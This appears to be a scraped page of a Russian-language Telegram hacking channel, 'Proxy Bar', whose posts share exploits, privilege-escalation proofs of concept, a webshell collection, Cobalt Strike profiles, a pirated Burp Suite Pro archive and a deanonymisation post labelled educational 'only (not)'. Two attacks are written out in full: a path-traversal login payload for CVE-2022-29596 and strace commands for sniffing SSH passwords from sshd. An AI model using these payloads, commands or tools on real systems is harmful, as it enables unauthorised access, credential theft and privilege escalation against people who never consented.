Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Linux PrivEsc
Злой CRON для самых маленьких - тут

#linux #cron #esc
👍4🔥1😱1
😱5🔥3
Random C2 Profile Generator
для cobalt-strike
download

#cobalt
👍8
Pentagrid
SMS-шлюз
с открытым исходным кодом для пентест проектов
read
install and run

#gsm #gateway #sms #2G/3G/4G/5G
🔥8👍7
burpsuite_pro_v2022.12.zip
566.6 MB
Burp Suite PRO version 2022.12.2
👍9😱5🔥2
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
read
👍2🔥2
CVE-2022-29596
MicroStrategy Enterprise Manager 2022
обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:

Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login

#microsoft #bypass
🔥5
Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture


#ssh #sniff #password
😱16👍9🔥3
CVE-2022-2414-POC.zip
1.2 KB
CVE-2022-2414
Дырка в pki-core
уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.
👍4🔥1
Defender Exclusions BOF
Хороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))
0_щ
👍7🔥2
Ну во первых с пятницей.
А во вторых, Я тебя сука по IP вычислю
*
только для образовательных целей (нет)

#track #ip #deanon
👍6😱6
DCOMPotato
Коллекция эксплойтов /повышения привилегий службы DCOM.
*
doownload

#exploit #dcom
👍5
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.
Исследование, анализ и обход.
Learn

#windows #syscall #bypass
👍6🔥5😱2
SIEM
SIEM Tactics, Techiques, and Procedures
read
👍8🔥3😱3
Пятничная викторина )))

#docker #vuln
👍3
DirCreate2System
Получаем NT AUTHORITY\\SYSTEM
*
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC

#windows #escpriv #POC #system
👍5
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling)
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol



#linux #privesc #sec
👍6
CVE-2022-45451
Acronis POC
download
🔥4👍1
Большая коллекция WEBSHELLS
На asp, aspx, php, jsp, pl, py, etc
download

#webshell
👍8
Super Xray
Web Vulnerability Scanner
download

#web #vuln #scanner
👍7🔥5